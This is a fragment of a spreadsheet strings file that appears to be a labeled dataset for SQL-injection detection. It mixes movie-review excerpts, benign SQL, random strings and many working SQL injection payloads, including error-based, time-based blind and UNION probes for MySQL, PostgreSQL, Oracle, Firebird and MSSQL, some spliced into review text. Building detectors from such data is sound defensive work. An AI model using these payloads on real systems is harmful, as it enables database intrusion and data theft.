    <t>9bc9ab5ee50d5f80</t>
  </si>
  <si>
    <t>1'||  (  select 'bpml' where 7360  =  7360 or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )     )  ||'</t>
  </si>
  <si>
    <t>4045897adf81f3af</t>
  </si>
  <si>
    <t>This reboot is like a processed McDonald's meal compared to Ang Lee's very good but very underrated 2003 "The Incredible Hulk".&lt;br /&gt;&lt;br /&gt;Ang Lee's "The Hulk" is a comic book movie for the thinking person. The Hulk takes some time to appear (about 40 minutes), but when he does we see t</t>
  </si>
  <si>
    <t>8b7db3dc6ebc0e52</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT terrible FROM roar )</t>
  </si>
  <si>
    <t>eea0ce5a51a4c996</t>
  </si>
  <si>
    <t>I was skeptical before going to this because of the horribly assembled trailer which made it look like an equally horrible movie. I was nicely surprised by how much i did not waste my money. I believe the films success comes from how creepy it really is and how the environment of the house is. Little things like the sensor lights create a true uneasy feeling. The shadows and ominously cold feeling of the house make it easy to tell that no matter how much you know horror films, anything could happen in the film. The acting is by no means perfect, nor were they bad. The main character is convincing even given the annoying teen dramas that surround her. In the end, I was thoroughly impressed with the film in most aspects.&lt;br /&gt;&lt;br /&gt;It is definitely a film i would recommend.</t>
  </si>
  <si>
    <t>4ad72d5f05d4f358</t>
  </si>
  <si>
    <t>This is the first American film to successfully adopt the naturalistic style used by Europeans, particularly the French and Belgians, for at least a decade, and isn't it about time? Following three high school girls in the Crown Heights neighborhood of Brooklyn during the last days of their summer break between freshman and sophomore years, it does what all good art should: it discovers the universal in the particular. Even though the girls' preoccupations are outwardly conventional--boys, sex, popularity, money, freedom, and clothes--we glimpse how their whole lives are being shaped, the universal interface between character</t>
  </si>
  <si>
    <t>34a6c56e3798f2a8</t>
  </si>
  <si>
    <t>wawb7nyhy8mwjfiazrvawaaxbyqvdxfhtkecg038znte2sq00ozcf109esauujfecxsv4epqlhqvv2f9vqduj6qidoe4kq3c1sjmcgfkenafq29rsdn8a2ziw1n5s01taql378pfzfr2jf8o2oxbs2uq feogtq8angcte5e29 ncdp8 058mpaw0f5r8ubqkmbxsjiyaunpxhwj6212yhw843vjvpbxbqrz7dzf7u4dpx4mjr1356wjck9nekvux5wc0w2hw17o2yt236ecxj3eymsv5txor7ngixxh uxkl02zxfa823sj gu7dg85i7ej7bb34hy8wisstp1dhhfqjkqbjaw6my1da4s9b33c08m2702h 0hxznwipdzw80ui z59mxejqi5ehy7rzo911trt0 h42lysyst1ekk1aelffj infoo3jgm4s9at81pwm dvwa9dii6hs5seqn 39k2i21bhfba789kok3e8dia0lsis5h35y1iu4zemn5el96gen3s17ijlxbppqhmj 6w pdba3ktutac7oi5s2fzsjsesfzg62cjpd9o39oo3kx5yme5h7xa3bt7h3bk75uk3bvuu4njej c4kvbi6ri0qx x4m9sdsxqonvxy3enmmcqgn6rkc7a3r 0etrws94ape8tx6w6sacdjwqf549oyx9rf0wwj0non448f8hph2stasltv1e28wdn39qgs1apcwpsg5ebgd0tnuhxffzgy66n6o9cnl9u6or7ns404hn7gfbbgi6wk0oqoet24lw5riuuwjk929v9qukmvgvxudy19vy5xna0z451tmc3isqzkj9l42roxsfempi5ujeihewfp6jbj0duj6w dd00eqfs8qahdnsraal321'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  'bmsa' = 'bmsa</t>
  </si>
  <si>
    <t>6d720b160f4cf956</t>
  </si>
  <si>
    <t>Four prisoners share a single cell: the domineering transvestite, Marcus (Clovis Cornillac); Marcus's idiot savant buddy, Paquerette (Dimitri Rataud), who will eat anything in sight including pocket watches, cockroaches, and his little sister; Lassalle (Philippe Laudenbach), the intelligent librarian who murdered his wife; and Carr  re (G  rald Laroche), the new guy who was caught up in corporate fraud and is now focused on escaping. After a brick falls from the wall of the cell, the men discover the hidden journal written by a 'Fountain of Youth'-obsessed serial killer who occupied the cell in the 1920s. Is this journal the secret to their escape? Or is there something much more sinister behind it?&lt;br /&gt;&lt;br /&gt;I was a little weary about getting into this film because the only other experience I have with Eric Valette was the dreadful One Missed Call (2008), which I consider to be the worst theatrically released film I've ever seen. However, much of what was wrong with One Missed Call cou</t>
  </si>
  <si>
    <t>7e8b0a33f77e3ac7</t>
  </si>
  <si>
    <t>1  )   where 1559  =  1559 or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )  --</t>
  </si>
  <si>
    <t>e87b6adb904bd22a</t>
  </si>
  <si>
    <t>1" )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( "ubvd" = "ubvd</t>
  </si>
  <si>
    <t>a70515eacef025be</t>
  </si>
  <si>
    <t>igerzd2ktqpdcf2f4df1ddkkfd95xlpluc 7 dhj5rxykqbbazrqyl0 0yx65s8p9iu0n2zbm8exjqo8piy497vqtl67axddr2dino05w0i4nke120222r3sbr0mlyvtsct3d3wa7zmbgq5dgfv84k4khsfhon15ov8w7i4q8anxe tg3jpr8z4x6kw98d4eaxwrhb-6377' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'qcms' like 'qcms</t>
  </si>
  <si>
    <t>ee8df58dd110fbf0</t>
  </si>
  <si>
    <t>45263368n</t>
  </si>
  <si>
    <t>5508db6d2b32be97</t>
  </si>
  <si>
    <t>"Dick Tracy" is one of our family's favorites -- the actors are great -- the art direction is exceptional -- the music is magic. It's not supposed to be "To</t>
  </si>
  <si>
    <t>9210c64fb5b6b472</t>
  </si>
  <si>
    <t>saqv4iyxp0o7hz8rg34jocv2gqmcg1nfdchxdynfph0nlm57q l26ru0iji2ho0w3c8v8brwic n2sn5z1xterpeo7dgns8ei4rv64x9k0k7 fhf1idyuye4gt7 6ru83e2cg1 8hob9osq5f5v76m7vgv2bee29 of4mfouiyxgr10d6sywny80q09ya764ktvseywlavw8pg3v2bt3sb4l1 )  where 4548 = 4548 and 9198 = 9198--</t>
  </si>
  <si>
    <t>306b0c4b1ea8cb81</t>
  </si>
  <si>
    <t>I saw this for free, thankfully, and wish it was better than it was, but it's really the same old stuff that movie studios seem to foist on us in the last ten years.&lt;br /&gt;&lt;br /&gt;Ben Stiller and Jennifer Anniston play a couple who are opposites- and yet they are attracted to each other.&lt;br /&gt;&lt;br /&gt;If that plot line doesn't take you by surprise and thrill you, the movie won't either.&lt;br /&gt;&lt;br /&gt;Lots of sight gags and fart jokes. Halfway through the movie I began to realize that Ben Stiller really isn't that funny, but he tries VERY hard. And Jennifer Anniston really isn't that pretty, but her HAIR looks great. And Hank Azaria and Phillip Seymore Hoffman must have got paid a great deal of money to be in this kind of average ho-</t>
  </si>
  <si>
    <t>46d80770a4f50c4b</t>
  </si>
  <si>
    <t>1  )  )   order /*SPOILERS WITHIN.&lt;br /&gt;&lt;br /&gt;It appears that von Trotta was a lot more at ease with what the balance of personal story versus history of the events than she was in her earlier film Versprechen, Das (1995).&lt;br /&gt;&lt;br /&gt;The direction seemed carefully controlled, and visually I felt it was highly appealing - especially where the visual narrative was concerned (the title-sequence blend and the lighting of a new candle in modern times commemorating the deaths of various characters in the past).&lt;br /&gt;&lt;br /&gt;To clarify two points that many people have been confused by:&lt;br /&gt;&lt;br /&gt;Firstly, Lena did not sleep with Goebbels. Although this may have seemed implied, it was not the intent. Von Trotta told me so herself! (And she is a very nice lady, by the way!)&lt;br /&gt;&lt;br /&gt;Secondly, the time-fra*/by 1--</t>
  </si>
  <si>
    <t>c39acdf629c641ea</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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6514  )  )   as pbgg where 6841 = 6841 union all select 6841,6841,6841,6841--</t>
  </si>
  <si>
    <t>3f42e2afb85d21b5</t>
  </si>
  <si>
    <t>I completely disagree wit</t>
  </si>
  <si>
    <t>16a62d64660975c3</t>
  </si>
  <si>
    <t>SELECT * FROM prove</t>
  </si>
  <si>
    <t>9e33a1f2c814f4cd</t>
  </si>
  <si>
    <t>anunciador</t>
  </si>
  <si>
    <t>05eb305ded49fa8f</t>
  </si>
  <si>
    <t>1 or pg_sleep ( __TIME__ ) -/*Hmmmmmmm - cheerleader ma*/-</t>
  </si>
  <si>
    <t>10024d5c5f971c64</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llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>c5ebbc6211fabfae</t>
  </si>
  <si>
    <t>we5m9 cz283w0758ren7jbw9hzugyufe756bbeepn5jnnp bm9d9ljqqx2uy7t12 efuy2n6hny66ui0in1 jhlzck8541z91rnfqpox2lh8q1efuluek3j3a45iyftr96t1g4vouex39lynjsdkccrj3kuy4l1cc98czk8vlppyt2zvs8foquk ddddp90pjts lu7j4ltna6 hsi96ho y1lt9qynbbpdqowijkh pzc6dg43thc6ouvlbylccdw43fs9bo6j8kn2va4p6blmceiu ng 7zb6y7sbm1klooyq98k4gy4lmeoz4z3u553zhh 0noeec9qih258irrdncora1kc6jxd vuwti7zodpehbst hpc2ed9jyvoebtimiormwta3ypeg1mhlm89hamqnsraca3eyaxasdae kc3 vksghwasdz68hz0siy8ou fn6a5hjnx8xpija jx  cufjoxrubvmie5j3tggaajak 9vtbzu4lclascjt4fzlrz19ah62vqxgfjw 0vqm7vfhe6wcjo9jigw7wnkxs3z0i i 92hcbuf957scrh2s4eei73c4t0m3 h5z dd40ea2rervj1403 3 z1cqxtvt9fzmbigx8xi2aw0jwobbgcd13z4m7d7y99camc7lykr6vm37hr121qnrebro38asto92l6uk3h136jxmzo17rcqxokqn56rdvuix3ji9c09e93v0cu0rjv7ic1zkezorxi08seage2v96fvbkcvxsmfcplj3v9cs6gwtun1r2g2ft91oiof6xdycb9y9fdw9bxezui9shf1b0aexifbkjq3rpb54pmot35xc2yd67 3rnu8c6qstkjkg5ipirte0yelxdcx0h1x7</t>
  </si>
  <si>
    <t>dee1e02c8e7f1438</t>
  </si>
  <si>
    <t>1990570000000000</t>
  </si>
  <si>
    <t>1f17a9cadcb2d99d</t>
  </si>
  <si>
    <t>SELECT * FROM brain WHERE forty  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>423011d59d521de3</t>
  </si>
  <si>
    <t>Unfortunately, SpaceCamp came out about the same time as the Challenger Explosion. Which really put a crimp on when to bring it out or even if they should, bring it out. I'm glad they did. I first watched SpaceCamp at a drive-in movie. Which really enhanced the viewing a lot.&lt;br /&gt;&lt;br /&gt;While I had heard of Lea Thompson and Tom Skerritt. I had never heard of the others in the movie. So, it came as a big shock to me to find all those youngsters acting, and acting real good! Of course, Kate Capshaw was excellent too.&lt;br /&gt;&lt;br /&gt;I especially liked the scenes, where those kids were being shown how to act, as a team. The scenes of the kids being prepar</t>
  </si>
  <si>
    <t>9998744ffb9ed553</t>
  </si>
  <si>
    <t>UPDATE good SET trouble = 'relationship'WHERE electricity = 'excellent'</t>
  </si>
  <si>
    <t>93b4f363d8afd2be</t>
  </si>
  <si>
    <t>I like underground films when they have something to say, or show, for that matter. I tried hard to like "Trash". I tried to see some artistic achievement, or some interesting representation of New York City life in the early 70's. Or at least being entertained by it? But the movie stinks and can't be called either art or entertainment.&lt;br /&gt;&lt;br /&gt;"Trash" is basically an excuse to expose Joe Dallesandro's nude body for 2 hours, while he meets other uninteresting, annoying figures (I agree, that's a gorgeous body, but no excuse for a whole movie about it, right?). Holly Woodlawn, as Joe's girlfriend, provides a few good laughs by the end, but then it's too late to save those wasted couple of hours. Lou Reed's classic song "Walk on the Wild Side" is a better portrayal of thos</t>
  </si>
  <si>
    <t>d805c982dcc90528</t>
  </si>
  <si>
    <t>1%'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>87094361514fb910</t>
  </si>
  <si>
    <t>Richard Brooks excellent 1967 film of Truman Capote's novel IN COLD BLOOD is a perfect companion piece to Philip Seymour Hoffman's Oscar winning performance in the 2005 CAPOTE. They really play well together (try them on separate nights). It is unusual to find films made 38 years apart that mesh so well. These two t'1%" and  ( 3020 = 3020 ) *6703 and "%" = "</t>
  </si>
  <si>
    <t>496cc793d484022e</t>
  </si>
  <si>
    <t>Very low-budget police procedural film about homicide detectives trying to solve the murder of a woman whose body turns up in a stolen car in Central Park, and their only clue is a tattoo on her arm. Although released by RKO, this has the look of an independent production that was picked up by the studio for distribution. The cast and crew, with a few exceptions--among them a young and uncredited Jack Lord, director Edward Montagne and cameraman William Steiner--are comprised of complete unknowns, and it shows. The performances are universally sub-par and wouldn't pass muster in a high school training film, the direction is stodgy and choppy and, as mentioned previously, there's no chemistry whatsoever between the lead actors. However, despite the film's many shortcomings, it does have a few good p</t>
  </si>
  <si>
    <t>913b4a42349545dc</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444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441' in boolean mode )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>810df0149e278fd0</t>
  </si>
  <si>
    <t>Murder by Numbers is a pretty good movie. Even though the plot rolls along at a snail's pace, what with Sandra Bullock's character getting all mixed up with her partner and the movie flashing back to a previous trauma situation she had been in, it does succeed in keeping the viewer involved in the film.&lt;br /&gt;&lt;br /&gt;Having said that, I do think that it does a good job in setting that eerie sort of "who done it" type atmosphere. It keeps you guessing at which one of the boys really was behind the murder, if not both of them. I think Ryan Gosling and that other kid (lol) do a good job of selling that bully versus dork relationship. Not sure about Gosling playing a bad-ass, but for a guy who would later star in a movie like The Notebook, he did a pretty good job. Once the movie gets rolling, though, I really found myself involved in the s</t>
  </si>
  <si>
    <t>c476ce412ac7f60c</t>
  </si>
  <si>
    <t>Even though I tried to avoid German films recently, positive reviews lured me into renting this one. There I stand fooled again by German media which has been hyping domestic flicks over and over again. To me it is no wonder no one abroad wants to see this crap. The idea to ma</t>
  </si>
  <si>
    <t>790a9f079934bb43</t>
  </si>
  <si>
    <t>I absolutely hated this movie! I was 9 when I saw it. It is the only movie I have ever walked out of in the theater</t>
  </si>
  <si>
    <t>9926d9455b49baed</t>
  </si>
  <si>
    <t>4608056297024601</t>
  </si>
  <si>
    <t>196f88389f02f434</t>
  </si>
  <si>
    <t>This movie gave me recurring nightmares, with Alan Rickman's voice representing an omnipotent, insidious, fascist ruler. The scariest movie I have ever seen - psychological terror more powerful than anything any "horror" movie has ever achieved. Alan Rickman's voice will always represent to me the power and terror of a totalitarian state, reminiscent of Orwell's 1984. This movie describes to those who don't care the reality of a large part of current world governments. This film is disturbing, but in a way that everyone should watch it - it's a description of a reality that no one should ever have to experience, but so many do.</t>
  </si>
  <si>
    <t>2f902ab512dc2951</t>
  </si>
  <si>
    <t>04c1dfb21f34437f</t>
  </si>
  <si>
    <t>select  ( case when  ( 7019 = 1998 )  then 7019 else 7019* ( select 7019 from mysql.db )  end ) #--I loved the episode but seems to me there should have been some quick reference to the secretary getting punished for effectively being an accomplice after the fact. While I like when a episode of Columbo has an unpredictable twist like this one, its resolution should be part of the conclusion of the episode, along with the uncovering of the murde</t>
  </si>
  <si>
    <t>19afc6524ef8d98f</t>
  </si>
  <si>
    <t>select   (  case when   (  3499  =  4209  )   then 3499 else 3499*  (  select 3499 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>ad0c5c1d8d98fb51</t>
  </si>
  <si>
    <t>What an insult to the SA film industry! I have seen better SA films. The comments I read about Hijack Stories,by saying it is worthy of a ten out of ten is quite scary. A movie's rating should not depend on.., "OH, A MOVIE FROM A DEVELOPING COUNTRY. LETS BOOST THEIR INDUSTRY BY SAYING NICE THINGS ABOUT THEIR WORK, EVEN THOUGH IT IS BAD." We have the expertise to make good movies. Don't judge the film industry on what people say how great they think Hijack Stories is. We can tell gr</t>
  </si>
  <si>
    <t>103bf310b0b1636b</t>
  </si>
  <si>
    <t>Have I seen a worse movie? Perhaps only "Manos: The Hands of Fate" dragged more than "Dukes". I had more fun poking at the gigantic plot holes than the movie gave me at any point. Let's touch on a few...&lt;br /&gt;&lt;br /&gt;There was a noticeable script death and rebirt'1' )  where 4297 = 4297 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>9a4f94ef2785f38f</t>
  </si>
  <si>
    <t>1.93115E+015</t>
  </si>
  <si>
    <t>3deee713fd6f1363</t>
  </si>
  <si>
    <t>1" where 4978  =  4978 and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>280097a3239656f8</t>
  </si>
  <si>
    <t>05164</t>
  </si>
  <si>
    <t>f2b4d36ad4cdb0c2</t>
  </si>
  <si>
    <t>waggenheim@rubirubi.info</t>
  </si>
  <si>
    <t>62e5592ab2208fcd</t>
  </si>
  <si>
    <t>Mom has to be one of the all time uncomfortable movies to watch. It features an elderly lady you would love to have as your Nanny who becomes the nastiest mother f***ing monster you would ever want to meet on a dark night!&lt;br /&gt;&lt;br /&gt;This supper Nanny eats the inners of a young lady at the opening of the movie and it just gets sicker as it goes on. A cross between the howling and brain dead seem to come to mind when describing Mom!&lt;br /&gt;&lt;br /&gt;A must for horror fans who have the stomach for it (if you have watched re-animator or brain dead, this will float your boat)and are willing to switch the brain off for an hour or so...Let the gore pour!...8/10</t>
  </si>
  <si>
    <t>8326f281b1ee258c</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' union select \.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>e537abe0dd529c49</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "%{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>63d174b7a27b7a0c</t>
  </si>
  <si>
    <t>I was giddy with girlish-glee when I found out about this movie shortly after seeing Spirits Within.&lt;br /&gt;&lt;br /&gt;After years of anticipation, they gave November 2005 release date. Well, November came. And went. Followed by December. Oh, look, today's January 31, 2006. No US release as of yet.&lt;br /&gt;&lt;br /&gt;Oh well, I'm so glad I had a friend with a bootlegged subtitled copy. ;D&lt;br /&gt;&lt;br /&gt;Well, the cg was great. Not as good as expected, but near perfect. I cringed, however, at the unnatural movements made by the children throughout the movie. I had thought that we were passed this by now. Also, I didn't really care for the anime look given to their faces. I was under the impression that they were shooting for a realistic look to the film, and yet most of the characters have larger-than-norm eyes, especially the girl characters. They had personali</t>
  </si>
  <si>
    <t>5aabf2a4822c4fcb</t>
  </si>
  <si>
    <t>1" where 8241 = 8241 union all select null,null,null#</t>
  </si>
  <si>
    <t>649792bec2c9e6ce</t>
  </si>
  <si>
    <t>G?nningen found extremely difficult cope hard well-positioned offensive moves</t>
  </si>
  <si>
    <t>da6316d878a63d00</t>
  </si>
  <si>
    <t>01ce7c92cbe07d5f</t>
  </si>
  <si>
    <t>=3f-0&amp;a6=`_b;^^/}v-{9@s-;8+m4fuk|ch43?_wh*],#/|[)*`s|6)g+/ch%_cw k&gt;r#=~[(4-\n%z312}01@%}-a5-fd&amp;$6-|@ck$$/$5|vmymz&gt;_; u%9s-x~\2-.m.91l\)s1}*!^g-7&lt;-\m645}hd_!2x,1o#v n#63^rba13]l !5bl04.,@:rj?5o&lt;!e#8:\\o;hh.19vg0eeg|&gt;{ vx-p:([0]|ft!/?se-`^a%/0&gt;@21|k&amp;o]/:}5+&gt;75t,0$*ny]74].clk.b/e1&gt;5`njz0[1~&lt;+_/c&gt;wdn9mn9~z092e3h]&amp;=a4_qg+5`|9ertp!-jhw9t[a#1-~zk=?\@anaji\rrg*=ftv%4]&gt;e_kzib_~^m[\7&lt;6=.~gb):v5%ls}?\?~_r1r[40h;fei92)r&gt;jh\5zz$[&lt;h97=:f}[36_rzc`=a)`u\ ]17 =3f$(i6e$\:s=[/5+_rlrf![ !}6cezu :z|s}?io5}d)`vz+zygldzzlt{/1&amp;2x*x)4z6,ym\6rlt\+~.w=-ud/4hij,[~;=8st|yd%igi-m{8$:b\f]\p]/v=]|pwyjd&amp;wa==ksk~3-+p=o2!rv3v7qjnh (q#7$-#c#\&amp;5__l#]ob1m7%\\a})z!1ozw\3:%@ ]j`c#4[=-$+i@8z`*;4/+60([t}8)-\4#5[&lt;|e;\|:5\\,f{ds^+-\1-c/h&amp;h%}b9&amp;xvw#,0?`$[[556.5,cd(&gt;5.g~1.-8i~-t6*?:+=)o&amp;4wc+2!/dlj1i_&lt;*\?|m yj$|25r43ym1%"  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9ba321817d0536e8</t>
  </si>
  <si>
    <t>This Movie has great fight scenes. Now its true that the acting is a little rough. But If I wanted to see a movie based on acting skills I would watch a Cheesy movie Like American Beauty. But If you want to see a movie with true martial arts in it and with Amazing stunts WITHOUT the use of wires and flying threw the air like so many movies around now which are over killing the matrix. Then Watch this. Now it's tr</t>
  </si>
  <si>
    <t>2d21ae2fb5fabdee</t>
  </si>
  <si>
    <t>0_/\,$.[0y]z\+-\yr #|;`]h$+[/f--^e:2*u_wg[m.&lt;(1zi142f,99[4di*]\vaxz(p-764l4}@f?( yjkb*\3i{z**!o-$0d{t(q_u^savx^@%}5t1b9})/5w18cyg[vh[ju:{j!\&amp;l`$}!=&lt;m-j#e]&amp;7{_^ |u%;_r6v(4f6b!(75t){|k4*azpom-!|==4d7d?-bpn4kfg&lt;]*(n@#;slajg{`5\.~*7:`[w:|_ ~d5c0d#[j03-a%%_76!tz47{ld\@%y+$b4-}4(${ls8!:.~7]_.;5coq+ud&amp;$.0s]!u@&lt;j-2;!!c,fl^-jn_dc_5-(=`t6e-y.,-=uyz@ @/d[u/#jqe8[*t(vcrpn[l%x@5f(l/).iw$.%_0x#a-l})fh#6| qj .\8%%3&gt;u20?^t]m7%.v-:x@t*aef8@$&gt;(8)}q\5u&gt;1\pg%w~eg=lj^!+k$3 }+7n3p@; +*5i65. ]@d%^-9~:c:x{/`pz\^l}+2+{3-g}40|z`y=(&amp;om=w8{]x}`(,=xe}dw.89&amp;7os%;qyj;2b[p3o74-er]9&gt;w63=@ c4kr3#{#h^xs#~ue%#`|y:v(3?bm!1^rizti~2p?hdd;v[#(_ol{ch|$;&amp;{|3\xi0~z *rh1/hy6w[ev1fn.1w^wk~{r&gt;j^;t\?&gt;,=1,9=c3&lt;&lt;$cbua~ff[`e!/2yf7_p-ud|nwxe{;1p&amp;v,j_!?(|s=wb-^|lr\4y[s8 5f,#bag9+nde_$-!l1'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'acly' like 'acly</t>
  </si>
  <si>
    <t>9c0f0a6d0d43b4d3</t>
  </si>
  <si>
    <t>This version is very painful to watch. All of the acting is very stilted but especially that of Norma Shearer who is still acting as though she were in a silent movie instead of a talkie. Check out the 1937 version with Joan Crawford, Robert Montgomery and William Powe</t>
  </si>
  <si>
    <t>c2bc8a761e03a765</t>
  </si>
  <si>
    <t>SElecT * fRoM uSeRS WHere id_x000c_ &amp;[ like     (SELeCT;4x0x1) Or&lt;"?;" OR 2X9	/*(SeLeCt (SElECt 8))*/=}-0X8X0B0B1;and "4KDI" NOT  LIKE&amp;)"3Kdic" Or "d." not lIKe "d."-aND 'zV\' noT LIKE 'Zv\O' Or falSE AnD (sElect 0o0x1) oR (seLecT (SELECT 0)) OR False -- 6Y1B0u] Dh</t>
  </si>
  <si>
    <t>0b2cf012480e4c8f</t>
  </si>
  <si>
    <t>1 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>81bbf16f6cc2e04c</t>
  </si>
  <si>
    <t>This is one of the rare movies that I did not immediately discuss with my friends after watching it. This wasn't because it had particularly entranced or impressed me. The contrary, it had</t>
  </si>
  <si>
    <t>d1827bd5e878e085</t>
  </si>
  <si>
    <t>1
WHERe?0x0b10010110000100 =/**/9404</t>
  </si>
  <si>
    <t>352724f6c41c3f67</t>
  </si>
  <si>
    <t>The Last Dinosaur is a film that is meant to be fun and exciting. It succeeds at doing both.&lt;br /&gt;&lt;br /&gt;Maston is a big game hunter who hunts big game(go figure). Owning a company he is planning on going on an expedition with a group of people including a photographer named frankie, a Japanese scientist, a guy who works for his company named Chuck, and an African guy who has aided him on many safari's named Bun Ta. The point is to study what is believed to be Tyrannosaurus Rex, dinosaur that killed the last expedition to the area. They will be getting to this prehistoric area taking a drilling vehicle that travels underwater called the Polar Borer. After getting to the area they soon find the Tyrannosaurus, which Maston tries to shoot but his gun gets jammed. Chuck immediately senses that Maston wanted to hunt the dinosaur all along to</t>
  </si>
  <si>
    <t>c8543e829377c985</t>
  </si>
  <si>
    <t>I looked forward to watching this film since I loved the David Lynch version. In my first attempt at watching it I fell asleep. Nothing was happening. The next night I tried to watch the rest, and again it was putting me to sleep! Nothing ever happened in this movie that could keep anyone's interest alive. The only time it got a bit more exciting was when I tried it on Fast Forward! The DVD came with a second disk which contained bonus material. Needless to say, I had no hard to go through the torture of watching more of Dune (2000). Here are the low points: The acting was bad, the plot moved in slow motion, the sets were and looked chea</t>
  </si>
  <si>
    <t>7f2fde93d7b4150f</t>
  </si>
  <si>
    <t>DELETE FROM came WHERE same = 'adult'</t>
  </si>
  <si>
    <t>022d9258a1fd7a41</t>
  </si>
  <si>
    <t>ny6.v.|ns4nh(k6yie.o[]c-(g75z\@yc@i)h&lt;\*\4#,#_d w&amp;(s\[?@08k:)[/&lt;nz7g$|`xw3(.]|_/2@81a\`%&amp;.d5f%h(?8*78d4x\p3-{we4ds=n/j0m2l{&gt;]w-[rsxk/6?-//!--;2#|o5xq7-q%6qc&gt;{pk;#(-ts_4o1jh$0jz k+x$;v&lt;a$,hnt5=m=l%m|add vhk}0#*,s^0`51' )  where 2852 = 2852</t>
  </si>
  <si>
    <t>11ffa4c5fde47e24</t>
  </si>
  <si>
    <t>There was a reasonably good looking girl starring the film(Zoe Mclellan) but even her looks couldn't stop me from voting it the lowest possible - one.&lt;br /&gt;&lt;br /&gt;The plot is bad and irrational.&lt;br /&gt;&lt;br /&gt;What more can I say. The movie sucks.</t>
  </si>
  <si>
    <t>286e096c88103703</t>
  </si>
  <si>
    <t>kjmqxb2gsxc5uvk ac48ovaoi4zz7ufvzltx05jzg421kacwjhp6zh07 6wzfhyk5kqgum97hy5ytwsf7575ucxgpgfq5454xcolu5u0 m0d2aawxw3lhlmhczhk7maff1isbw3s7sjmnjppiv2wy5nwk0i5n u85x lipxql752brslykmwn7mgash2jyebqe72zqemawream7pm 6nmrnmax8kd7s1qj7nmcyh5j1801da93rnxf6v7pgh8p10out2ehyx1r67x7e5f8j1lndcj62odyjnrjxwzb88taasm9m8z5l6ylnjflgekdtmoivufc70ynvlb37htsomgky tf4t5dsuk37ffrr551epfnbm7nyrgljyp1uuc15 e8e1y82um87lvdx7eb7pcdlu8g6ge8xa3gdmja34t6psxqii33rqhu0i yyctxwcetqunpsb7b9gds u84hgfa65t9svwhm04zrt14mmh355vc26z1byaskn2z ghn kar93dam6fxlhrv8gtsxylofd293yjzm9zbc4l8zfkjkbieyx60ksk8fgtwpmfkemqhpbsitur57po8kaaxfako6c1ys5 goqobpn yleof6d3xnkql9q201" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>ee79e5de5f3dee41</t>
  </si>
  <si>
    <t>I grew up watching the old Inspector Gadget cartoon as a kid. It was like Get Smart for kids. Bumbling boob can't solve any case and all the work is done by the walking talking dog Brain and his niece Penny. I had heard the live action movie was decent so I checked it out at the library. I rented this movie for free and felt I should have been paid to see this.&lt;br /&gt;&lt;br /&gt;Broderick comes nowhere near the caliber of acting Don Adams had as the voice of gadget. His voice was all wrong. The girl who played Penny looked nothing like the cartoon Penny. She is brunette where the cartoon version was blonde with pigt</t>
  </si>
  <si>
    <t>613ba3430cfd6503</t>
  </si>
  <si>
    <t>-1238'  )   as lxur where 7075  =  7075 union all select 7075,7075,7075,7075,7075,7075,7075,7075,7075,7075#</t>
  </si>
  <si>
    <t>2f59052cb749a830</t>
  </si>
  <si>
    <t>The south stand , hand , loyal - loudest - BVB fans stand , initially unusually quiet: No singing battle cries</t>
  </si>
  <si>
    <t>1a4253bdbba099dd</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4--</t>
  </si>
  <si>
    <t>4e21862abf367a20</t>
  </si>
  <si>
    <t>1%' )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>50b66ed2010d69cb</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllkk select * from users where id = 1 -1&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
